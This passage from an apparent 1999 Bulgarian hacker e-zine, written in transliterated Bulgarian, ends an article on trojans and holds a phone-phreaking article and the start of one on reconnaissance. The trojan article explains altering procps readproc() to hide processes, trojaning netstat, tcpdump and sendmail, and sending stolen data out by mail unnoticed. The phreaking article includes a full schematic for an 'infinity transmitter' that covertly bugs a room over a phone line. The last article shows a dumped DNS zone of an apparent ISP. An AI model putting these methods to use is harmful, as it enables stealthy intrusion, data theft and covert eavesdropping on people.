vmstat, w, i watch. Promenite li gi, smiataite, che ste promenili vsichki
sistemni tools za nabliudenie na procesi. Ili pone v 99% ot sluchaite.
Kogato se zaemete s promianata na procps, oburnete vnimanie na "proc"
poddirektoriata pri source-ovete. Tam sa osnovnite headeri i c-failove,
koito se izpolzvat ot vsichkite komandi (top, ps i taka natatuk). Promenite
li neshto tam, pri prekompilaciata vsichkite programi naslediavat
promianata. Taka che eto edno udobno miasto, kudeto da se porovite.
Interesen e failut proc/readproc.c, i po-tochno funkciite readproc() i
ps_readproc(). Te imenno tursiat procesi, otgovariashti na zadadenite
uslovia (primerno spisuk ot pid-ove, etc), kato triabva da vurnat kato
rezultat informacia za sledvashtia podhodiasht proces, koito da bude
list-nat. Tezi funkcii sa v osnovata, vsichki drugi (t.nar. wrappers) se
obrushtat kum tiah, taka che promenite li tezi dvete, vsichko shte e ok.
Tezi dve funkcii vsushtnost obhozhdat pid-ovete podred, ako dadenia proces
ne otgovaria na usloviata, go othvurliat i tursiat sledvasht, i taka dokato
nameriat ili dokato ne izcherpat vsichkite procesi. Mnogo udobno bi bilo
prosto da se promeniat suvsem malko, taka che da othvurliat niakoi
po-specialen za nas proces ;-)
Dvete funkcii sa pochti ednakvi - ps_readproc() e prosto copy/paste-nato
kopie na readproc(), sled koeto sa bili zakomentareni otdelni proverki,
iavno za da otgovaria na iziskvaniata na komandata ps. Promenite li ednata
funkcia, niama da e nikakuv problem po sushtia nachin da promenite i
vtorata, koeto shte e mnogo polezno.
3. Troianci, vgradeni v drugi programi
--------------------------------------
Po tezi na praktika niama chak kakvo tolkova da se kazhe, tui kato vsichko
zavisi ot tova kakvo celite da napravite. Ako iskate da kriete procesi,
slagate troianec v procps (za tova vizh sekcia 2.2.5.), ako iskate da se
sledi za trafika prez modema, mozhete da troianizirate source-ovete na
iadroto i modulite mu, etc. A mozhete i da dadete na potrebitelia pravena ot
vas programa s troianec (standartniat metod pri Windows sistemite), koito da
se extractva i tihichko da se nastaniava niakude.
Tuk obache niama zashto da "kriete" konete, zashtoto te vsushtnost za
potrebitelia sa legalna programa. Triabva samo da vnimavate da ne si lichi,
che ste podmenili originalnata programa.
4. Obshti polozhenia (i po-specialno kriene na trafika)
-------------------------------------------------------
Kolkoto i da sa razlichni dvata tipa troianski kone (vgradeni ili
samostoiatelni), ima i opredeleni obshti polozhenia. Te se vizhdat i ot
kazanoto do tuk.
Edno obache e obshto, i ostana nezasegnato, a imenno krieneto na trafika.
Taka, de, v povecheto sluchai troiancite sluzhat za predavane na niakakvi
danni. Kak obache da go skriem?
4.1. Kriene na IP trafik
------------------------
Ako triabva da kriete trafikut na vgraden troianski kon, mozhe bi e
nai-dobre da go vgradite v programata, koiato znaete, che administratorut
izpolzva, za da si sledi vruzkite.
Naprimer, mozhete da go vgradite v netstat. Ili puk, ako znaete, che na
otdelna konzola na sistemata non-stop vurvi tcpdump (kakto naprimer na
mashinite na ManiaX, ili na moiata sobstvena), bi bilo udachno da
troianizirate tcpdump.
Vuzmozhno e, razbira se, da vgradite troianche i v samia kernel, za da krie
opredeleni vruzki, no za tova niamam nikakva ideia kak tochno da stane.
4.2. Izprashtane na poshta
--------------------------
Ne sa riadkost sluchaite, kogato iskate da poluchite rezultatite ot
troianskia kon po elektronnata poshta. Za celta obache troianecut triabva da
ia izprati. Tova mozhe da stane po niakolko nachina.
4.2.1. Chrez direkten connection
--------------------------------
Edin ot tezi nachini e chrez direktna vruzka do niakoi izbran ot vas SMTP
server, za koito znaete, che shte forward-ne poshtata. Troianecut se svurzva
kum SMTP porta na servera, izprashta kakvoto triabva da se izprati i
zatvaria connection-a.
Tozi metod e mnogo udoben, ako ste se pogrizhili za tcpdump naprimer (ili
dori vashiat troianec e v tcpdump).
4.2.2. Chrez sendmail
---------------------
Drug nachin za izprashtane na poshta e chrez sendmail, no ne chrez vikane na
komandata sendmail (koeto bi se zabeliazalo), ami chrez ustanoviavane na
vruzka po loopback interface-a kum lokalnia SMTP port (127.0.0.1:smtp).
Po tozi nachin se ostavia izprashtaneto na poshtata da se svurshi ot
sendmail, chiato mail-aktivnost veche niama da predizvika podozrenia.
Drugo predimstvo e, che tcpdump sledi samo na edin opredelen interface, t.e.
kogato sledi za trafika po lokalnata mrezha ili po PPP-vruzkata, aktivnostta
na vashata programa po loopback interface-a niama da se vidi.
4.2.3. Troianec v sendmail
--------------------------
Vgrazhdaneto na troianskia kon v programata sendmail e mozhe bi
nai-udachnoto reshenie, kogato triabva da se izprashta poshta. Taka niama
nikakvi vruzki po loopback interface-a, vuobshte - nishto nenormalno - edna
programa (sendmail) pravi tochno tova, za koeto e prednaznachena - prashta
poshta...
Ami tolkova ot men... Ako sum izpusnal neshto, ne me vinete - v kraina
smetka, ne moga da pokria absoliutno cialata tema, puk i kakvo shte pravite
zavisi ot tova kakvo vi triabva. Nadiavam se pone ideite v tozi tekst da sa
vi dopadnali. Do skoro :-)
28.7.1999
IronCode
>> EOA <<
]]><![CDATA[
-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú#05ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-
[ a r t i c l e ] [ a u t h o r ]
Several Box Schemes General Failure
-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-
I sled kato minaha kup4inata administratiwni gluposti otnosno
"pridobiwaneto" ot powe4eto ot nas na titla "student", dojde wreme i za
malko po4iwka. Ne, ne goworq za CON-a, a za more, planina, veni, piene, etc.
No po4iwkata ostawa za po-kysno (e, to we4e nqkoi ot nas po4iwaha, ama
ajde:) Sega sme se hwanali da prawim CON i shte go prawim dokraj (ama kak
zwu4i samo:) Be nakratko, this summer the circus is moving to the city:) Wse
hubawi neshta - "dwe glawi mislqt po-dobre ot edna, a kwo ostawa, ako wsi4ki
ot PHREEDOM sa zaedno" - twa go e kazal poetyt. E, pone taka mislq, de!
Losho shte e ako ima oshte 1-2 takiwa i posle da se zabrawqt. Ama dokolkoto
znam wsi4ki, kolkoto i da ni izbiwa na phun i anarchy, go priemame mnogo
naseriozno i edwa li ideqta shte iz4ezne, entusiazma shte si otide ili pyk
birata shte swyrshi:)
(B.NEIL - li4i si 4e hi4 ne go biwa da pishe intro-mintro i takiwa gluposti,
nali??:)
Eto gi, idwat!!! Twa e moqta personal best kolekciq ot boxes, koito
izpolzwam (ili wse oshte ne - zashtoto nqkoi ot tqh sa nowi). Sledwat 6
boxes. Sami precenete dali mogat da wi swyrshat rabota (B.NEIL - be to shtom
si e box move li da ne wyrshi rabota:). I eto wi go - sdywkano, smlqno i
izpljuto za was ot General Failure:
I. ADVANCED PEARL BOX
Samo s nqkolko dumi da razqsnq kakwo tochno shte da e towa viwotno pearl
box. Pearl box predstawlqwa 4isto i prosto edin generator na 4estoti, ili,
kakto zwu4no mu wikat na english, tone generator. Po princip prawilno
postroena pearl box move da generira 4estoti ot 1-9999Hz. Wie, estestweno,
si naglasqte 4estotata, koqto wi trqbwa. Nqma da pisha powe4e za taq box -
ako nqkoj se interesuwa, ima ot kyde da nameri info za neq. Eto sega i
drugata wersiq:
4ASTI
CD4049 RCA integralna shema
.1 mikrofarada kondenzator
1 mikrofarad 16V elektroliten kondenzator
1K syprotiwlenie
10K syprotiwlenie
1M syprotiwlenie
1N914 diod
nqkolko SPST (Single Pole Single Throw) prewklu4wateli (s 2 pozicii)
9 wolta bateriq
...i drugi drebni neshta deto wi se motkat w kyshti
SHEMA
+ 16V 1uF -
_______________________________||_____
| ! ! || | _
| _______________________ |__________| |/| 8oma
____|__|_____:__|__:__|_ | __________| | |
| 9 10 11 12 13 14 15 16 | | | |_|\|
| CD4049UBE | | |
|_1__2__3__4__5__6__7__8_| : | _
| | |__| |__| | |____________________|_________[-]
| | ! ! : [b]
| |__________________________| [a]
| : : | [t]
| ! 1N914 ! ! [e]
|___________|/|__________________________ [r]
: |\| : : | [i]
| | | | [q]
| 10K | | |__________[+]
|___/\/\/\__| |
| | |
|_____||____| |
|| | |
.1uF 50V | |
| |
___| |___
| |
|_/\/\/\_____/\/\/\ | 1Meg
1K ^ |
|____|
(za twa ascii prosto nqmam dumi - proizwedenie na izkustwoto:-)
DOPYLNENIQ
Za da poddyrvate 4estoti, koito iskate da izpolwate 4esto, trqbwa samo da
slovite promenliwo syprotiwlenie i da go naglasite kydeto hwashtate to4nata
chestota. Togawa prosto slovete prewklu4watel (ot teq kato kop4e) na
liniqta. Syshto taka move da gi swyrvete wyw weriga (ama twa samo ako imate
powe4e wyobravenie i nerwi w izlishyk:)
| ___ |
| o o |
| /\/\/\___| |__|
| ^ |
|____| ___ |
| o o |
| /\/\/\___| |__|
| ^ |
|__| |
! !
: (etc) :
There - have phun!!!
II. OXYGEN BOX
(toq box e krysten w pamet na stariq mi snowboard - RIP,
pyk i weche ne pomnq kak beshe originalnoto ime:-)
Tazi kutijka se izpolzwa za da ot4ita dali telefonniqt razgowor se taksuwa
ili ne. Shtom se wklu4i, kutiqta ima dwa swetodioda - zelen i 4erwen.
Zeleniqt zna4i "bezplaten" razgowor, a 4erweniqt zna4i, 4e ste bil izraboten
ot BTC:((
4ASTI
1 zelen swetodiod
1 4erwen swetodiod
2 kysi vi4ki
1 platka
10K oma syprotiwleniq (2 br)
2 malki krokodilki
SHEMA
| tel.liniq |
| |
|------ ------|
| |
|-----x-----------*-------|
| |
|-----x-----------*-------|
"x" e syprotiwlenie, a "*" e diod
Ediniqt diod trqbwa da e s anod, obyrnat kym syprotiwlenieto, a drugiqt
trqbwa da e s katoda kym syprotiwlenieto.
Kogato liniqta e otworena (t.e. slushalkata e wdignata), zeleniqt diod shte
sweti. Ako sweti 4erweniqt, prosto smenete polqrnostta na kutijkata. Kogato
nabirate nomerata (analogowo), shte primigwa zeleniqt swetodiod, no dokato
prawite bezplatni razgowori, toj ne trqbwa da izgaswa i 4erweniqt ne trqbwa
da sweti. Shtom razgoworyt zapochne da se taksuwa, zeleniqt shte izgasne i
4erweniqt shte swetne.
Poneve i dwata dioda sa w protiwopolovna posoka, samo ediniqt move da sweti,
kato towa zawisi ot polqrnostta w momenta. Towa se izpolzwa, kogato
razgoworyt zapochne da se taksuwa, zashtoto polqrnostta na liniqta se
promenq.
III. ADVANCED SILVER BOX
Mi twa e tolkowa advanced, kolkoto i gornata advanced pearl box - ne, 4e e
neshto mnogo advanced, prosto e drug wariant na box-a.
I pak malko sprawka: silver box sluvi za syzdawane na DTMF (Dual Tone Multi
Frequency) tones A, B, C i D. Malko po-nadolu shte razberete za kakwo sluvat
te (B.NEIL - edwa li:)).
4ASTI I OBORUDWANE:
1. dvoben (pod dvoben razbiraj malyk) nabira4 (s drugi dumi i white box
move)
2. prewklu4watel (s dwe pozicii)
3. poqlnik + syotwetnite mu attribs
Towa podobrenie na silver box shte wi pozwoli syzdawaneto na A, B, C i D
zwuci. Kogato prewklu4ite, kop4etata 3, 6, 9 i # stawat syotwetno A, B, C i
D. 4ipyt wytre ima wyzmovnost da syzdawa takiwa zwuci. Wsi4ko, koeto trqbwa
da se naprawi, e da swyrvem wsi4ko neobhodimo. Tazi modifikaciq move da byde
naprawena i za telefoni, koito imat DTMF tone encoding 4ip. Nego move da go
poznaete po ozna4enieto 5089 ili S2559 ili MK5380 ili TCM5087N. Eto sega i
sglobqwaneto:
1. Mahnete kapaka na bateriite, bateriite i malkite wint4eta. Sega
kutiqta trqbwa da se otwori lesno (s malko sila, de:)
2. Otworete kutiqta taka, 4e polowinata, koqto e s bateriite, da wi e
otlqwo i bateriite da sa nadolu. Sega trqbwa da wivdash zadnata 4ast
na 2 platki.
3. Namerete dwata reda, kydeto e swyrzan 4ipa. Gornoto lqwo kra4e na
dwata reda ne trqbwa da ima pripoj po nego. Towa e pin9.
4. Prikrepete kysa vi4ka kym pin9
5. Wivdate li 8-te vi4ki, koito otiwat kym keypad? Razpojte 4etwyrtoto
otlqwo i go swyrvete s kysa vi4ka
6. Zapoete kysa vi4ka i kym we4e praznoto mqsto na kop4eto (abe ot
kydeto razpoihte)
7. Raztopete ili probijte dupka w plastmasowata kutiq za
prewklu4watelq. Naj-dobroto mqsto e obratnata strana na tazi, na
koqto se namirat LED-owete.
8. Wkarajte prewklu4watelq i go zakrepete dobre.
9. Swyrvete vi4kata ot keypad kym sredata na prewklu4watelq. Swyrvete
drugite 2 vi4ki kym drugite 2 swobodni mesta na prewklu4watelq. Sega
prosto zatworete kutijkata i priberete bateriite.
Sega prewklu4watelqt shte wi pozwolqwa da izpolzwate kop4etata ot 3-tata
kolonka na keypad i za A,B,C i D zwuci.
Keypad sys silver box izglevda dolu-gore taka:
1 2 3 A
4 5 6 B
7 8 9 C
* 0 # D
Eto wi i 4estotite na razlinite kop4eta na keypad:
KEY FREQ. #1 FREQ. #2
1 697 1209
2 697 1336
3 697 1477
A 697 1633
4 770 1209
5 770 1336
6 770 1477
B 770 1633
7 852 1209
8 852 1336
9 852 1477
C 852 1633
* 941 1209
0 941 1336
# 941 1477
D 941 1633
Razbira se, na keypad nqma A, B, C i D, oswen ako ne polzwate silver box, za
koqto stawa wypros w momenta. 4estotite se izmerwat w herci.
Az li4no ne znam za kakwo se izpolzwa silver box (nito toq wariant).
(B.NEIL - az kazah li wi 4e edwa li she razberete za kakwo sa A, B, C, D
tones:-) Samo znam, 4e pozwolqwa da se wliza wyw woenni mrevi (ili pone taka
pisheshe nqkyde:) w 4uvbina, a u nas se namirat za access do 4estoti na
bolnici i drugi rezerwirani 4estoti (10x RamireZ). No towa e poneve tozi now
wariant e skalypen otskoro i oshte ne sme mu namerili prilovenie. Wsi4ko s
wremeto si:)
IV. INFINITY TRANSMITTER
Ha sega de - kwo da wi kava za toq box. Mnoooogo useful neshto. Dosta se
4udih dali da go slova za toq CON, poneve imah symneniq, porodeni ot Spite
Master, 4e wsichki sa zapoznati s neq. Wse pak riskuwam.
Malko history:
Ideqta q imah otdawna, i pri edna sreshta sys Spite Master toj mi kaza, 4e
takowa chudo weche e izmisleno. Ama az si wikam "e kwo pyk, shte preotkriq
toplata woda". Po4nah da se mycha i tykmo da go zawyrsha (sorry, malko se
olqh - da go zawyrshIM : special 10x to NEIL) (B.NEIL - ejj, polaskan sym:)
i mi pratiha material. ObedinihME gi i se polu4i slednoto:
Po princip infinity transmitter aktiwira telefona 4rez obavdane. Wryzwa se
kym tel.liniq, i kogato telefonyt pozwyni, tq predawa po liniqta wsichki
zwuci ot staqta. Obache towa, koeto wivdate, se razli4awa dosta ot
originalnata box. Ideqta e da move ne wseki, kojto se obadi, da slusha w
staqta, a samo sled wywevdane na daden kod. Ako ne se wywede, proti4a
normalen telefonen razgowor. Ama az ne znam - shtoto ne NI (B.NEIL - ej i
tuka deto se gowori za lipsa na akyl e pisal NI - pak i az da sym w kupa;)
stiga tolkowa akyla li, shtoto bqh zaet dosta li - no ne uspqh da go
izdokaram towa razpoznawane. Eto wi kwoto stana:
4ASTI
390 k 1/4 wat syprotiwlenie (R1,R4,R8)
5.6 M 1/4 wat syprotiwlenie (R2)
6.8 k 1/4 wat syprotiwlenie (R3,R5,R6)
5 k syprotiwlenie (R7)
100 k 1/4 wat syprotiwlenie (R9,R16)
2.2 k 1/4 wat syprotiwlenie (R10)
1 k 1/4 wat syprotiwlenie (R13,R18)
470 oma 1/4 wat syprotiwlenie (R14)
10 k 1/4 wat syprotiwlenie (R15)
1 M 1/4 wat syprotiwlenie (R17)
.05 uF/25 diskow kondenzator (C1)
1 uF 50V elektroliten kondenzator (C2,C3,C5,C6,C7)
(za predpochitane ne polqrizirani)
.01 uF/50V diskow kondenzator (C4,C11,C12)
100 uF 25V elektroliten kondenzator (C8,C10)
5 uF 150V elektroliten kondenzator (C9)
10 uF 25V elektroliten kondenzator (C13)
555 tajmer (TM1)
CA3018 usilwatel(A1)
PN2222 NPN tranzistor (Q1,Q2)
D40D5 NPN tranzistor (Q3)
50V 1amp 1N4002 diod (D1,D2)
1.5 k/500 transformator (T1)
mikrofonche:) (M1)
telefonen jack za izhod (J1)
9 volta bateriq (B1,B2)
SHEMA
(B.NEIL - druvte se da ne padnete:)
.________________________ kym zeleniq tel.kabel
|
| .______________________ kym cherweniq tel.kabel
| |
| | ._________(M1)______________.
| | | |
| | | R1 |
| | !__________/\/\/____________!
| | | _!_ C1
| | |tazi vica zazemqwa ___
| | |<=usilwatelq | R2
| | | !___________________/\/\/_____________.
| | | ._______!_______. |
| | !___________________!4 9 11!_____________________________!
| | | | | |
| | !___________________!7 12._____________________________!
| | | | A1 | R3 |
| | !___________________!10 ____*8!_______.____/\/\/____________! ^
| | | | / | | | |
| | | C4 | / | \ |2ma
| | !____||______. | / | /R4 B1 +
| | | || | | / | \ |!|!
| | | R7 | C2 | / | / |
| | !____/\/\/___!__)|__!8*_/ | | S1 |
| | | ^ | 6!_______! otricat. <__/.__!
| | | | C3 | | | C5 |
| | | !_____|(___.__!3 | '-|(-| |
| | | | | 5 1!____________! |
| | | \ !_______._______! | B2|!|!
| | !________. R8 / | | +
| | | \ | | R6 |3ma
| | | !__________!____________________|_____/\/\/______! |
| | | R5 | | | v
| | !__/\/\/___________|____________________! |
| | | | |
| | | | |
| | | C6 | |
| | | |-)|-' R9 |
| | | !_________________/\/\/_______. |
| | | | | |
| | | Q1 _!_ | R10 |
| | !____________/ \____________________________!__/\/\/_____!
| | | | |
| | | | |
| | | C8 | |
| | !__________)|_______________________________|____________!
| | ! | |
| | / | |
| | -----| Q2 | |
| | | \ | |
| | | > | |
| | | | | |
| | | | | |
| | | !_____________. | |
| | | | | |
| | !__________. | | |
| | | | | |
| !________. | | ._____! |
| | | | | |
| | | | | |
| | | | | C7 |
| | | | '-|(-| |
| |_________|_________!_______.T1._________________| |
| | | 1500 )||( 500 |
| | | ohm )||( ohm |
| | !______.)||(.__. |
| | | | |
| | | | |
| | | > |
| | | |/ |
| | | +----| Q3 |
| | | | |\ |
!____________________|_________|_______|______!__. D1 C9 |
| | | '-|<---|(------| |
.______________! | | | |
| | | | |
| .________________! | | |
| | | | |
\ | .________________! C11 | |
/ | | .___||____________! |
R13 \ | | | || | |
/ | | | | |
\ !___.___|_______________________! | |
| | | | | R16 | R15 |
| v | | !___/\/\/\________!___/\/\/_!
| otricat. | | | D2 | |
| B1,B2 | | !_____|<__________! |
| | \ | | |
| | / | .____________!_. |
| | \R14 |C12 | TM1 2 | |
| | / !_||_!5 4!_______!
| | \ | || | | |
| | | !____!1 8!_______!
| | | | | 7 6 3 | |
| | | | !_____._.____._! |
| | | | | | | |
| | | | C13 | | | R17 |
| | | !___)|_____!_!____|__/\/\/__!
| | | | | |
!___________|___!_______________________|_________________! |
| | | |
| \ | C10 |
| /R18 !__________)|_______________!
| \
| /
| |
!___O J1
izhod
OZNA4ENIQ
syprotiwlenie: -/\/\/-
prewklu4watel: _/ _
bateriq: -|!|!-
kondenzator(elektroliten): -|(-
kondenzator(diskow): -||-
tranzistor: (c) > (e)
\_/
|(b)
diod: |<
_ _
transformator: )||(
)||(
_)||(_
! ozna4awa wryzka mevdu vucite. NAPRIMER: _!_ zna4i wryzka,
a _|_ e samo krystoswane.
Kato se ima w predwid, 4e ne sym osobeno umen w taq nasoka i w elektronikata
izobshto, shte kava samo twa deto go pomnq, a ne twa deto edin spec she go
widi wednaga na shemata. Zna4i, infinity transmitter predstawlqwa usilwatel,
wyrzan kym tel.liniq 4rez transformator. Shemata se aktiwira 4rez promqnata
na woltava pri zwyn na telefona. Towa wednaga zadejstwa tajmera, na kojto
pin3 e polovitelen i zadejstwa transistorite Q2 i Q3. Tajmeryt TM1 ostawa
zadejstwan za opredelen period ot wreme, zawisesht ot stojnostite na R17 i
C13 (obiknoweno e okolo 10sek). Kogato Q3 se wklu4i ot tajmera, toj simulira
polovenie na zatworena slushalka. Towa stawa 4rez prewklu4washtoto dejstwie
na Q3, kato se swyrve s 500 omow kraj na transformatora. Q2 swyrzwa
zazemenata 4ast na A1 (usilwatel) i Q1 (izhoden tranzistor) kym
otricatelnite polusi na B1 i B2.
Sistemata se wklu4wa/izklu4wa ot prewklu4watelq (S1). Mikrofon ulawq zwucite
i gi prenasq kym pyrwite 2 tranzistora na A1. Seshtate se, 4e ka4estwoto na
priemane na zwuka zawisi ot kachestwoto na mikrofona! R7 kontrolira
4uwstwitelnostta na sistemata. Diodyt D1 osigurqwa otricatelen signal kym
pin2 na TM1 i taka startira kryga.
Pyrwo iskam da si priznaq - ascii-to ne e moe (kazwam si bez boj:) (B.NEIL -
e to pyk se edno ne si li4i ot pryw pogled). E, wse pak ne wqrwam da ima
normalen 4owek, kojto da go ima pod ryka i da zapo4ne da go prawi nanowo. Ma
to pyk, ot druga strana, koj e kazal, 4e sme normalni? Uff, malko se
obyrkah...... - aaaa, prodylvawam natatyk:
Wsichki 4asti sa nadpisani w ascii-to, koeto e mnogo dobre! Samo
ostanalite - krokodilki, skobi - ne sa dadeni. Wse pak te se izpolzwat po
velanie (skobite, de, ne krokodilkite:). Te pomagat dosta pri wryzwaneto na
vicite. R7 se izpolzwa da nastroi zwuka taka, 4e da se polu4awa priemnliwo
ka4estwo. Wie precenete dali e priemliwo! Move da uweli4ite wremeto, prez
koeto tajmeryt stoi aktiwiran, 4rez promqna na stojnostta na C13 (toj ne
move da registrira zatwarqneto na telefona, zatowa raboti na tajmer).
Stojnost ot primerno 100 mikrofarada shte uweli4i wremeto okolo 10 pyti.
Prewklu4watelq S1 opredelq dali sistemata da raboti ili ne. Be nakratko - s
nego wklu4wate i izklu4wate sitemata ot dejstwie. Priblizitelno taka shte
izglevdat bateriite, kogato sa swyrzani:
<-v_____. .______. ._____. .____->
| | | | | |
__!___!__ | | __!___!__
| + - | !_/ _! | + - |
| | prewkl. ^ | |
| 9volta| | | 9volta|
!_______! otricat. !_______!
Sled towa prosto wryzwate 4rez buksite (jack) kym tel.liniq.
Ako imate problem, ima nqkolko osnowni neshta, koito trqbwa da prowerite
pyrwo. Prowerete dali polqrnostta e spazena (towa e w slu4aj, 4e ste se
sprql na warianta s polqrizirani kondenzatori). Sled towa prowerete dali
zapoqwaneto e napraweno dobre i 4isto. Ostawa samo da se uwerite, 4e
bateriqta e slovena prawilno i 4e prewklu4watelqt e w prawilna poziciq. Ako
wse oshte ne raboti, ima samo edno reshenie (e, pone taka si mislq, de) -
po4wame nanowo ;-)))
Wse mi se struwa, 4e move da se slovi oshte neshto tuk. Za sega e samo ideq,
ama 4akajte skoro i gotow rezultat. Stawa wypros, 4e e wyzmovno kym tozi
device da se wyrve i drugo ustrojstwo, koeto da se aktiwira ot telefona pak.
Goworq za alarma, swetlini, etc, ama twa si e bydesht proekt. Ama samo ne mi
kradete ideqta - posle dokato mi dojde druga... Inache s radost priemam
pomosht za twa neshto. Ako ima takiwa dobrowolci (B.NEIL-edwa li she se
nameri tolkowa izpadnal 4owek da trygne da mu pomaga, ama...:), nali znaete:
gfailure@phreedom.org
i she ima golemi 10x, ako go swyrshim do zimata. Shoto togawa kat padne
snega i nikoj ne move da me widi, dokato ne si otide pak (snega, de).
(B.NEIL - powqrwajte mi - taka e!!)
V. SOME LINKS
Smqtam, 4e tazi 4ast ot file-a nqma nuvda ot comment:
http://www.chat.ru/~radiospy/
http://telehack.net/html/telephony/texts/ukphreak
http://www.sonic.net/~theruler/txt/ess.html
http://www.wraithtech.zzn.com
VI. WMESTO ZAKLU4ENIE
(basi - twa typo zaglawie li kak da go nareka neznam - go bqh widql
w nqkyw u4ebnik po literatura - I think so. Ama nogo smeshno zwu4i,
nali??)
Ta takaaa. Tolkowa ot mene za tozi CON. Imah dosta golemi nadevdi da moga da
wi kava neshto po-interesno, ama imashe i izpiti, i malko problemi ot drugo
estestwo (family, cops, girlfriend, etc.) i poradi edna ili druga ot
goreposo4enite pri4ini ne movah dave da si sybera mislite za neshto
po-swqstno. Ama hopefully drugiq pyt she wi dam malko po-cool stuff. Imam
malko guznoto 4uwstwo, 4e za toq CON ne movah da si swyrsha rabotata i w
drug aspekt - ne movah da priwleka 4uvdestranno u4astie. Ama kato se ima
predwid kolko mnogo otziwi polu4ihme i kakwa dobra reklama naprawihme, si
pozwolqwam da zatypq towa 4uwstwo s malko nadevda za sledwashtite CON's.
I poslednata 4ast ->
Special 10x goes to: NEIL (toj si znae shto)
dad (za mnogo cennata help ot wreme na wreme)
my girl (4e me tyrpi oshte)
DEVIL PHREAK
ACID WARP
hevnst
DML
F|3|@|r m|3 (nadqwam se 4e go napisah prawilno:)
DEXROS
XELA
(....uff maj se pouwlqkoh:)
(B. NEIL - taka li se pishe taq duma bre?..i da - uwle4e se:)
(Bel.Iron - i da ne se pishe taka, nali za tova sum korektor;-)
I na si4ki ot PHREEDOM ! ! !
LOGGING OFF DO DRUGIQ PYT : General Failure
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
>> EOA <<
]]><![CDATA[
-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú#06ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-
[ a r t i c l e ] [ a u t h o r ]
Collecting Information from Remote Sites ManiaX
-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-
Cqlata ideq na tazi statiq e kak da suberem vsichkata vuzmozhna informaciq
za daden site/provider/host i t.n. v Inet. Purvonachalno se izkushavah da
vzema da napravq vsichkite izsledvaniq v/u edno mqsto, obache mozheha i da
me nadushat, a tova nqmashe da e mnogo hubavo, zashtoto go praveh ot sebe
si ( ne mi se zanimavashe da go pravq ot nqkoj shell, mrazq da si chakam
ssh-to). Tuk sa zasegnati osnovno nachini, koito sa suvsem normalni i
nenakazuemi po nikakuv zakon, t.e. tva si e suvsem normalna (e... ne suvsem,
ama ne e i nenormalna ot tipa na hvurchasti nestea paketi) aktivnost.
1) Services-bazirani nachini :
1.1. DNS - poddurzhani serveri, upstream provideri, backup linii
Tva lichno na mene mi e lubimo, ponezhe na mnogo mesta chovek mozhe da se
dobere do cqlata DNS baza (koqto mozhe da e mnogo, povtarqm, MNOGO golqma -
naprimer na demon.co.uk mi omruzna da q teglq na 2riq MB)... Po-nadolu ima
edna-dve primerni DNS bazi s komentari (komentarite sa ogradeni s <[ ]> ).
Primerna DNS baza :
; BIND version named 8.1.2-T3B Sun Jan 3 23:06:10 MST 1999
; BIND version bdale@rover:/home/bdale/debian/bind-8.1.2/target/bin/named
; zone 'spnet.net' last serial 0
; from 212.50.0.10 at Fri Jul 16 14:34:27 1999
<[ dotuk izhoda e ot named-xfer - programata za svalqne na DNS bazata. ]>
$ORIGIN net.
spnet IN SOA ns.spnet.net. shtinkov.ns.spnet.net. (
1999071400 28800 7200 604800 86400 )
IN NS ns.spnet.net.
IN NS purgatory.spnet.net.
IN MX 2 ns.spnet.net.
IN A 212.50.0.15
<[ SOA record - koj otgovarq za bazata - shtinkov@ns.spnet.net, koi sa
glavnite name serveri i koj e mail relay. (t.e. informaciq za imeto
spnet.net ) ]>
$ORIGIN spnet.net.
dialup073 IN A 212.50.13.73
dialup074 IN A 212.50.13.74
dialup105 IN A 212.50.13.105
modem10 IN A 212.50.0.53
dialup086 IN A 212.50.13.86
dialup106 IN A 212.50.13.106
modem11 IN A 212.50.0.54
dialup087 IN A 212.50.13.87
dialup107 IN A 212.50.13.107
modem12 IN A 212.50.0.55
dialup088 IN A 212.50.13.88
dialup110 IN A 212.50.13.110
<[ razlichi dialupi i t.n. (malko poorqzani ot mene) ]>
skat IN A 212.50.0.161
IN MX 10 skat.spnet.net.
$ORIGIN skat.spnet.net.
mail IN CNAME skat.spnet.net.
www IN CNAME skat.spnet.net.
proxy IN CNAME skat.spnet.net.
ns IN CNAME skat.spnet.net.
ftp IN CNAME skat.spnet.net.
<[ nqakuv clinet sus sobstven server ....kojto obache stoi v tqhnata zona..
izglezhda ne gi burka imeto im da e xxx.spnet.net - znachi ne sa Inet
provider ]>
$ORIGIN spnet.net.
modem13 IN A 212.50.0.56
dialup089 IN A 212.50.13.89
dialup091 IN A 212.50.13.91
<[ oshte dial-upi...loshoto na named-xfer-a e che vuobshte ne podrezhda. Toq
problem se zabelqzva oshte poveche kato se pogledne DNS-to na bg - sigurno
na danbo na mashinata izglezhda super, ama kato mine prez named-xfer mu se
*** ***** ]>
cst IN A 212.50.0.193
svilengrad IN MX 10 cst.spnet.net.
$ORIGIN svilengrad.spnet.net.
cst IN CNAME cst.spnet.net.
mail IN CNAME cst.spnet.net.
proxy IN CNAME cst.spnet.net.
www IN CNAME cst.spnet.net.
ns IN CNAME cst.spnet.net.
ftp IN CNAME cst.spnet.net.
<[ pak neshto podobno na skat - samo che izglezhda sa predstaviteli na SPNET
v Svilengrad.... ]>
$ORIGIN spnet.net.
spnet2digsys-local IN A 212.50.10.238
<[ IP na routerskiq interface kum drug provider - DIGSYS po princip e
vuzprieto na vseki router na interfejsa adresa da ima ime,koeto otgovarq na
vruzkata koqto e prez tozi interfejs.(vuzprieto e...ne vinagi e taka) ]>
dialup127 IN A 212.50.13.127
dialup128 IN A 212.50.13.128
dialup130 IN A 212.50.13.130
intbg2spnet IN A 212.50.10.241
<[ pak kum drug provider vruzka ]>
spnet2intbg IN A 212.50.10.242
<[ IP na obratniq interface... (t.e. na otsreshtniq router) ]>
irc IN CNAME purgatory.spnet.net.
<[irc server na firmata - prosto CNAME kum nqkoj ot golemite im
